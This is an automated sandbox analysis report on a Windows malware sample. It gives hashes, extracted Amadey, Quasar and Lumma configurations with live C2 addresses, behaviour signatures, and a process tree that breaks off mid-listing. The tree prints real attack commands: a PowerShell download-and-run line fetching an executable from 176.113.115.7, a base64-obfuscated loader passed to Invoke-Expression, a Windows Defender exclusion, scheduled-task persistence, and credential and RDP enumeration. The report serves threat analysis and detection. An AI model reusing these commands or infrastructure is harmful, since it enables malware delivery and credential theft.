Analysis

  • max time kernel
    135s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/04/2025, 02:09

General

  • Target

    2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    34a337d692950cbf43cfc0dcda3a8704

  • SHA1

    fe282e2aeb931f85bd7e0a1a0c4a1ed3c6981d16

  • SHA256

    75b96cd2edcfa2f357238e3a1517607cea86a80b5298b0d9a018eb906820d26e

  • SHA512

    39cb30544e80af2d7a043625d8c6e3c983676903ce59d9c0060dd931fbb2a6b671fd52005fef7b87b90319577b44d4bca00dbea1929b63b5d59eaba59f683462

  • SSDEEP

    24576:2qDEvCTbMWu7rQYlBQcBiT6rprG8a0cu:2TvC/MTQYxsWR7a0c

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

C2

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes
  • encryption_key

    BF72099FDBC6B48816529089CF1CF2CF86357D14

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Modded Client Startup

  • subdirectory

    SubDir

Extracted

Family

lumma

C2

https://rodformi.run/aUosoz

https://6jmetalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://qspacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://metalsyo.digital/opsa

https://anavstarx.shop/FoaJSi

https://spacedbv.world/EKdlsk

https://hadvennture.top/GKsiio

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 18 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 7 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 26 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Deletes itself 1 IoCs
  • Drops startup file 4 IoCs
  • Executes dropped EXE 29 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Modifies file permissions 1 TTPs 4 IoCs
  • Reads ssh keys stored on the system 2 TTPs

    Tries to access SSH used by SSH programs.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 3 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 25 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Launches sc.exe 64 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 43 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 24 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 64 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 6 IoCs
  • NTFS ADS 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 5 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 27 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2268
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:7300
    • C:\Users\Admin\AppData\Local\Temp\2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-04-02_34a337d692950cbf43cfc0dcda3a8704_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:3588
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /create /tn SEysXmamn4o /tr "mshta C:\Users\Admin\AppData\Local\Temp\wk98sbHaS.hta" /sc minute /mo 25 /ru "Admin" /f
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:232
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn SEysXmamn4o /tr "mshta C:\Users\Admin\AppData\Local\Temp\wk98sbHaS.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:2312
      • C:\Windows\SysWOW64\mshta.exe
        mshta C:\Users\Admin\AppData\Local\Temp\wk98sbHaS.hta
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2540
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5984
          • C:\Users\Admin\AppData\Local\TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE
            "C:\Users\Admin\AppData\Local\TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4948
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Adds Run key to start application
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1060
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:5524
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:5036
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                    8⤵
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • Drops startup file
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: AddClipboardFormatListener
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:1016
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5360
              • C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe
                "C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe"
                6⤵
                • Executes dropped EXE
                • Enumerates connected drives
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:2716
                • C:\Windows\system32\cmd.exe
                  "cmd.exe" /c "dxdiag /t > \"C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_4074842567.txt\""
                  7⤵
                  • NTFS ADS
                  PID:1540
                • C:\Windows\system32\net.exe
                  "net" statistics workstation
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:212
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 statistics workstation
                    8⤵
                      PID:5320
                  • C:\Windows\system32\vaultcmd.exe
                    "vaultcmd" /list
                    7⤵
                      PID:3664
                    • C:\Windows\system32\tasklist.exe
                      "tasklist"
                      7⤵
                      • Enumerates processes with tasklist
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4952
                    • C:\Windows\system32\tasklist.exe
                      "tasklist" /FO CSV /NH
                      7⤵
                      • Enumerates processes with tasklist
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4744
                    • C:\Windows\system32\tasklist.exe
                      "tasklist"
                      7⤵
                      • Enumerates processes with tasklist
                      • Suspicious use of AdjustPrivilegeToken
                      PID:740
                    • C:\Windows\system32\cmdkey.exe
                      "cmdkey" /list
                      7⤵
                        PID:4692
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1656
                        • C:\Windows\system32\cmdkey.exe
                          "C:\Windows\system32\cmdkey.exe" /list
                          8⤵
                            PID:2568
                        • C:\Windows\system32\tasklist.exe
                          "tasklist"
                          7⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1952
                        • C:\Windows\system32\certutil.exe
                          "certutil" -store My
                          7⤵
                            PID:2112
                          • C:\Windows\system32\certutil.exe
                            "certutil" -store -user My
                            7⤵
                              PID:5892
                              • C:\Windows\System32\Conhost.exe
                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                8⤵
                                  PID:1920
                              • C:\Windows\system32\tasklist.exe
                                "tasklist"
                                7⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1956
                                • C:\Windows\System32\Conhost.exe
                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  8⤵
                                    PID:3056
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "powershell" -Command "Get-VpnConnection | ConvertTo-Json"
                                  7⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2360
                                  • C:\Windows\System32\Conhost.exe
                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    8⤵
                                      PID:5192
                                  • C:\Windows\system32\tasklist.exe
                                    "tasklist"
                                    7⤵
                                    • Enumerates processes with tasklist
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4524
                                  • C:\Windows\system32\tasklist.exe
                                    "tasklist"
                                    7⤵
                                    • Enumerates processes with tasklist
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3664
                                    • C:\Windows\System32\Conhost.exe
                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      8⤵
                                        PID:3940
                                    • C:\Windows\system32\tasklist.exe
                                      "tasklist"
                                      7⤵
                                      • Enumerates processes with tasklist
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4460
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "
                                      7⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Hide Artifacts: Ignore Process Interrupts
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:432
                                    • C:\Windows\system32\tasklist.exe
                                      "tasklist"
                                      7⤵
                                      • Enumerates processes with tasklist
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5336
                                    • C:\Windows\system32\tasklist.exe
                                      "tasklist"
                                      7⤵
                                      • Enumerates processes with tasklist
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:6016
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        8⤵
                                          PID:4556
                                      • C:\Windows\system32\cmdkey.exe
                                        "cmdkey" /list
                                        7⤵
                                          PID:1552
                                        • C:\Windows\system32\tasklist.exe
                                          "tasklist"
                                          7⤵
                                          • Enumerates processes with tasklist
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1156
                                        • C:\Windows\system32\cmdkey.exe
                                          "cmdkey" /list:TERMSRV/69.48.201.74
                                          7⤵
                                            PID:1624
                                            • C:\Windows\System32\Conhost.exe
                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              8⤵
                                                PID:1588
                                            • C:\Windows\system32\tasklist.exe
                                              "tasklist"
                                              7⤵
                                              • Enumerates processes with tasklist
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5576
                                            • C:\Windows\system32\tasklist.exe
                                              "tasklist"
                                              7⤵
                                              • Enumerates processes with tasklist
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:740
                                            • C:\Windows\system32\tasklist.exe
                                              "tasklist"
                                              7⤵
                                              • Enumerates processes with tasklist
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2528
                                              • C:\Windows\System32\Conhost.exe
